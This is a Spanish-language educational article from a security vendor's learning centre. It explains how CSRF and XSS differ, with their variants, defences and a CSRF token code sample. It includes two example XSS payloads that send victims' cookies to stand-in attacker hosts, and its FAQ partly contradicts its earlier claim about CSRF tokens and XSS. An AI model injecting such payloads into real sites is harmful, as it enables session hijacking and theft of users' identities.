Wallarm / Wallarm Learning Center / ¿Cuál es la diferencia entre CSRF y XSS?
Ataques
In

¿Cuál es la diferencia entre CSRF y XSS?

8 Mins Read
¿Cuál es la diferencia entre CSRF y XSS?

¿Qué es XSS?

Inmersos en el inagotable cosmos de la ciberseguridad, nos encontramos frente a frente con el Cross-Site Scripting, o XSS. En su esencia, esta amenaza virtual es una trampa preferida por los maleantes digitales, ya que les permite introducir comandos malintencionados en páginas web, causando estragos en el círculo de usuarios de la misma. A grandes rasgos, los infiltrados se benefician de información privada confiscada, como las cookies de identificación almacenadas por el navegador.

Profundizando en el XSS

Profundizando en el XSS

El XSS nace y prospera en la falta de una verificación rigurosa de la información suministrada por los usuarios en los sitios web antes de que se procese en el explorador. Así, los criminales cibernéticos pueden inscribir código dañino en los datos de entrada que se ejecutará cada vez que un usuario cargue la página.

Para clarificarlo, visualicemos a un delincuente digital que introduce un código malicioso en la sección de comentarios de un blog. Cada vez que otro usuario visite dicho comentario, la trampa se activará en su navegador, abriendo la puerta al robo de cookies de identificación o la realización de actos potencialmente perjudiciales.

Clasificando el XSS

El XSS se manifiesta en tres estilos notables: persistente, reflejado y de tipo DOM.

  1. XSS Persistente: Se caracteriza por la presencia constante de un código dañino en el servidor. Así, cada vez que un usuario ingresa a la página en cuestión, el script mal intencionado se transmite desde el servidor y se ejecuta en su navegador.
  2. XSS Reflejado: A diferencia del anterior, esta versión de XSS se enlaza con la URL de la página en lugar de residir de forma permanente en el servidor. Por lo tanto, cada vez que alguien accede a esa URL, la trampa se activa en su navegador.
  3. XSS de tipo DOM: En este caso, el código dañino perturba la estructura de Objetos del Documento (DOM) de la página en el navegador de un usuario, induciendo cambios en el contenido o comportamiento de la página.

Ilustrando un Ataque XSS

Imagine la situación a través de un ejemplo concreto de un ataque XSS:


<script>document.location='http://www.paginafalsa.com/robacookies.php?cookie='+document.cookie;</script>

Este comando está programado para redirigir al usuario a una página web controlada por el atacante, donde las cookies de identificación del usuario se enlazan a la URL. De esta forma, el atacante puede apoderarse de las cookies a través de la URL, falsificando así su identidad.

Es crucial destacar la seriedad de las amenazas de XSS, ya que conceden a los criminales cibernéticos acceso a la información personal de los usuarios, permitiéndoles actuar en su lugar. En este contexto, es responsabilidad de las plataformas digitales reforzar sus mecanismos de verificación de datos de los usuarios para reducir las posibilidades de convertirse en el blanco de esta forma de intrusiones.

`

 

`

¿Qué es CSRF?

La Incursión Por Petición Fraudulenta de Un Sitio Cruce, que de aquí en adelante lo referiremos como IPFSC, es un tipo específico de invasión cibernética que se apropia indebidamente de las credenciales de un usuario para ejecutar acciones no permitidas dentro de una plataforma en línea, sin el conocimiento o la aprobación del usuario afectado.

Proceso Operativo de la IPFSC

Un embate de IPFSC surge cuando un atacante malicioso confunde a un usuario para que haga interactuar con un enlace corrupto o ingrese a un portal contaminado con un código pernicioso. Cuando el usuario pica en tal engaño, se desencadena el código dañino que, en su turn, ejecuta una acción en representación del usuario afectado, sin el conocimiento de este último. Estos movimientos maliciosos podrían ampliarse desde publicar una observación improcedente hasta materializar una transacción económica ilícita.

Ejemplificación de un Asalto de IPFSC

Visualiza una instancia donde has iniciado sesión en tu banca digital. Inadvertidamente, sin desconectarte, navegaste a un portal cibernético contaminado por un hacker. Dentro de este portal, se alberga un código pernicioso que hace una petición a tu entidad bancaria para transferir fondos a la cuenta del hacker. Tu banco, al detectar que te mantienes autenticado, interpreta que la petición es auténtica y ejecuta la transacción.

Estrategias de Protección contra la IPFSC

Hay múltiples técnicas y tácticas de protección para amortiguar los embates IPFSC. Una estrategia recurrente es el uso de tokens IPFSC. Esta ficha es un índice exclusivo y aleatorio que se integra en todas las peticiones emanadas del usuario. Este índice se verifica en el servidor cada vez que se emite una petición. Si no se halla concordancia, la petición se deniega.

Otra estrategia es comprobar la legitimidad de la petición, lo que implica confirmar que dicha solicitud se originó de una fuente confiable.

Contraposición entre IPFSC y XSS

Técnica IPFSC XSS
Modo Logra que un usuario ejecute una acción no consentida. Inyecta código malicioso para extraer información confidencial.
Defensa Uso de tokens y verificación de origen de peticiones. Validación y codificación de los datos entrantes y salientes.

En resumidas cuentas, la IPFSC es una amenaza cibernética que engancha al usuario para que ejecute movimientos no consentidos en una plataforma digital donde se han autenticado previamente. De este modo, es crucial implementar estrategias preventivas, como el uso de tokens IPFSC y la comprobación de la fuente de las peticiones.

XSS vs CSRF: ¿cuál es la diferencia?

Las brechas de seguridad como el XSS y el CSRF afectan seriamente el rendimiento y la integridad de las aplicaciones web, a pesar de tener métodos de operación y repercusiones distintas.

¿De qué forma operan el XSS y el CSRF?

El Cross-Site Scripting, también conocido como XSS, es una estrategia de ataques que se basa en la inserción de código malintencionado en páginas web que serán accedidas por navegantes desprevenidos. Este código inyectado tiene la capacidad de interactuar con las cookies y sesiones del usuario, lo que puede dar lugar a infracciones como usurpación de identidad y fuga de datos.

En comparación, el Cross-Site Request Forgery, conocido también como CSRF, opera induciendo a los usuarios a que realicen acciones no consentidas dentro de una plataforma web a la que están conectados. Mediante un ataque CSRF, el atacante tiene el poder de manipular al usuario a actuar de ciertas maneras sin su consentimiento, lo que podría dar lugar a cambios no aprobados en la configuración del usuario, usurpación de cuentas o incluso de identidad.

Factores distintivos entre XSS y CSRF

  1. Motive del ataque: Mientras el XSS aprovecha el navegador del usuario para acceder a la información confidencial por medio de scripts, el CSRF dirige al usuario a ejecutar acciones no consentidas en una plataforma web.

  2. Manipulación de la petición: Durante un ataque XSS, el agresor inserta código perjudicial en la página web. Sin embargo, en un caso de CSRF, el agresor induce al usuario a mandar una petición HTTP a una plataforma web.

  3. Autenticación: Para un ataque XSS, no es necesario que el usuario esté conectado para activar el script malintencionado. Por otro lado, para que un ataque CSRF sea efectivo, es imprescindible que el usuario esté autenticado en la plataforma web.

XSS CSRF
Instala scripts en el navegador del usuario Dirige al usuario a actuar ciertas maneras
Inserta código perjudicial en la página web Manipula al usuario a mandar una petición HTTP
No necesita autenticación del usuario Necesita autenticación del usuario

¿Qué métodos existen para prevenir los ataques XSS y CSRF?

XSS y CSRF necesitan de estrategias de prevención distintas. Para evitar el XSS, es crucial validar, codificar y escapar de los datos ingresados por el usuario. Las políticas de seguridad de contenido (CSP, por sus siglas en inglés) también pueden ser eficaces para evitar la activación de scripts perjudiciales.

Para impedir un ataque CSRF, se pueden utilizar tokens CSRF, los cuales son piezas de información únicas y aleatorias vinculadas a la sesión del usuario. Verificar el encabezado de origen de las peticiones también puede asegurar su legitimidad.

En resumen, a pesar de que tanto el XSS como el CSRF son amenazas graves, operan de forma diferente, afectan a las aplicaciones de manera distinta y requieren de métodos de prevención específicos. Para proteger de manera adecuada las aplicaciones web y los datos de los usuarios, es crucial comprender estas diferencias.

¿Pueden los tokens CSRF prevenir ataques XSS?

Los códigos de autorización anti-CSRF son una línea valiosa de protección contra intrusiones CSRF y actúan como un dique robusto en resguardo de los usuarios. Ahora bien, ¿Son estos códigos una defensa efectiva contra la infiltración XSS? Categóricamente, la respuesta es negativa. Los códigos de autorización anti-CSRF, pese a ser un pesado escudo contra las incursiones CSRF, no poseen las habilidades para enfrentar embestidas XSS.

Por qué los códigos de autorización anti-CSRF no son aplicables contra infiltraciones XSS

La relevancia de los códigos de autorización anti-CSRF emerge al crear una cadena única para cada tarea ejecutada por el internauta. Este código se sumerge en diversos espacios de formularios web y se coteja con cada petición POST para afirmar que un internauta verdadero realiza la petición. Sin embargo, este muro no es viable frente a una infiltración XSS.

Las infiltraciones XSS ocurren cuando un atacante inserta una cadena perjudicial en una página web que se desatará en el explorador del internauta. Esta cadena perjudicial tiene la capacidad de expropiar datos relevantes como las cookies de la sesión y podrían ser alteradas para suplantar la identidad digital del internauta.

Los códigos de autorización anti-CSRF son fuertes al prohibir que un agresor realice acciones bajo el nombre del internauta al falsear peticiones, pero no bloquean que un atacante logre acceder a las cookies de sesión mediante una infiltración XSS. Los códigos de autorización anti-CSRF no tienen la capacidad de obstruir que una cadena dañina se dispare en el explorador del internauta.

¿Cómo mejoramos nuestra protección contra infiltraciones XSS?

Aunque los códigos de autorización anti-CSRF no son la solución completa contra infiltraciones XSS, existen otras prácticas de seguridad que ofrecen salvaguarda ante actividades dañinas. Aquí detallamos algunas:

  1. Examen de información proporcionada: Es crucial que se examine y limpie de cualquier cadena perjudicial proporcionada por el internauta.

  2. Cifrado del contenido de salida: Transformar determinados caracteres a su equivalente en lenguaje HTML previene que sean interpretados como código en el explorador del internauta.

  3. Normas de seguridad para contenido: Permiten que los propietarios de páginas web decidan qué tipo de recursos son permitidos en sus páginas, reduciendo así la posibilidad que se dispare un código dañino.

  4. Cookies solo mediante HTTP: Ajustar las cookies de sesión para que sean accesibles únicamente por medio del protocolo HTTP, disminuyendo el riesgo de extracción a través de códigos dañinos.

Para concluir, aunque los códigos de autorización anti-CSRF sucumben ante las infiltraciones XSS, se deben incluir en nuestras estrategias de defensa otras técnicas como el análisis de datos proporcionados, cifrado del contenido de salida, normas de seguridad de contenido y ajustar las cookies para que sean accesibles solo mediante HTTP.

Tabla de comparación

Para entender en profundidad las diferencias entre CSRF y XSS, analizamos cada uno de ellos en detalle a continuación:

Aspecto CSRF XSS
Descripción CSRF o Manipulación de Petición a la Web en Fase Cruzada, es un ataque tramposo que aprovecha el navegador del objetivo para ejecutar acciones indeseables en una aplicación web en la que el receptor ya tiene autenticidad. XSS, o Inserción de Secuencias de Comandos en Fase Cruzada, es un ataque que injerta códigos malévolos en páginas web dignas de crédito, que se activan posteriormente en el explorador web del receptor.
Propósito El propósito de una incursión CSRF es hacer acciones no consentidas valiéndose de un usuario ya con acceso, sin el conocimiento de éste. El propósito de una infiltración XSS es activar secuencias de comandos en el explorador web del receptor para hurtar información o realizar otras funciones dañinas.
Variante de vulnerabilidad CSRF es una variante de vulnerabilidad que saca provecho de la confianza de una página web en el usuario. XSS es una variante de vulnerabilidad que se aprovecha de la confianza del usuario en una página web.
Métodos de evitación La manera común de evitar CSRF involucra el uso de tokens CSRF, que son distintos para cada sesión y petición. Para evitar XSS, generalmente se utiliza codificación de salida, verificación de entrada y la aplicación de políticas de seguridad de contenido.

Tokens CSRF y XSS

Uno de los componentes cruciales en este análisis es la implementación de tokens CSRF para resguardarse de amenazas CSRF. Hay que recalcar que estos tokens no tienen la capacidad de defenderse de amenazas XSS. He aquí un ejemplo de cómo se puede aplicar un token CSRF:


// Crear un token CSRF
var miTokenCSRF = generarTokenCSRF();

// Añadir el token CSRF a una petición
$.ajax({
    url: '/api/tarea',
    type: 'POST',
    data: {
        miTokenCSRF: miTokenCSRF,
        // Otros datos de la petición
    }
});

En este ejemplo, el token CSRF es creado y se suma a una petición. Si un intruso trata de efectuar una tarea en representación del objetivo, no podrá hacerlo si no tiene el token CSRF, que es inimitable para cada sesión y petición del objetivo.

En cambio, una incursión XSS podría representarse de la siguiente manera:


// Código dañino insertado en una página web
<script>
    // Hurtar cookies
    var galletasWeb = document.cookie;
    // Enviar cookies a un servidor en el dominio del intruso
    $.post('http://intruso.com/hurtar', {cookies: galletasWeb});
</script>

En este muestra, el código perjudicial es insertado en la página web y se activa en el explorador web del objetivo. El código hurta las cookies del objetivo y las envía a un servidor dominado por el intruso. Contrario a CSRF, XSS no necesita que el objetivo esté con acceso en el sitio y los tokens CSRF no pueden defenderse de este tipo de amenaza.

`

 

`

FAQ

A continuación, responderemos algunas de las preguntas más frecuentes sobre CSRF y XSS.

¿Qué es más peligroso, CSRF o XSS?

Ambos ataques son peligrosos, pero de diferentes maneras. XSS puede ser más destructivo ya que permite la ejecución de scripts en el navegador del usuario, lo que puede llevar a robo de información, defacement de sitios web y otros daños. Por otro lado, CSRF puede ser más sutil y difícil de detectar, ya que explota la confianza de un sitio web en el navegador del usuario.

¿Pueden los tokens CSRF prevenir los ataques XSS?

Los tokens CSRF están diseñados para prevenir ataques CSRF, no XSS. Sin embargo, si se implementan correctamente, pueden hacer más difícil para un atacante llevar a cabo un ataque XSS. Aún así, la mejor defensa contra los ataques XSS es la codificación de salida y la validación de entrada.

¿Cómo puedo proteger mi sitio web contra CSRF y XSS?

Para protegerse contra CSRF, puede usar tokens CSRF, SameSite Cookies y otras técnicas. Para protegerse contra XSS, debe codificar la salida, validar la entrada, utilizar políticas de seguridad de contenido y otras medidas de seguridad.

¿Es posible un ataque combinado CSRF/XSS?

Sí, es posible. Un ataque combinado podría ocurrir si un atacante explota una vulnerabilidad XSS para inyectar un script malicioso que luego realiza un ataque CSRF.

¿Qué es la inyección de scripts entre sitios (XSS)?

La inyección de scripts entre sitios (XSS) es un tipo de ataque de seguridad en el que un atacante inyecta código malicioso en un sitio web confiable.

¿Qué es la falsificación de solicitudes entre sitios (CSRF)?

La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque de seguridad que engaña al navegador de la víctima para que realice una acción no deseada en un sitio web en el que está autenticado.

Pregunta Respuesta
¿Qué es más peligroso, CSRF o XSS? Ambos son peligrosos, pero de diferentes maneras.
¿Pueden los tokens CSRF prevenir los ataques XSS? No directamente, pero pueden hacer más difícil para un atacante llevar a cabo un ataque XSS.
¿Cómo puedo proteger mi sitio web contra CSRF y XSS? Utilice tokens CSRF, SameSite Cookies, codificación de salida, validación de entrada, políticas de seguridad de contenido, etc.
¿Es posible un ataque combinado CSRF/XSS? Sí, es posible.
¿Qué es la inyección de scripts entre sitios (XSS)? Es un ataque de seguridad en el que un atacante inyecta código malicioso en un sitio web confiable.
¿Qué es la falsificación de solicitudes entre sitios (CSRF)? Es un ataque de seguridad que engaña al navegador de la víctima para que realice una acción no deseada en un sitio web en el que está autenticado.


WEBINAR
MARCH 6, 2024
Wallarm Innovation Update: Improving Your API Security Posture With GraphQL Protection And API Policy Enforcement
Sign up for our comprehensive webinar
REGISTER

Learning Objectives
Ivan Novikov
Author |
Verified Expert
Bughunter, working with top tech companies such as Google, Facebook, and Twitter. Blackhat speaker. With over a decade of experience in cybersecurity, well-versed in system engineering, security analysis, and solutions architecture. Ivan possesses a comprehensive understanding of various operating systems, programming languages, and database management. His expertise extends to scripting, DevOps, and web development, making them a versatile and highly skilled individual in the field.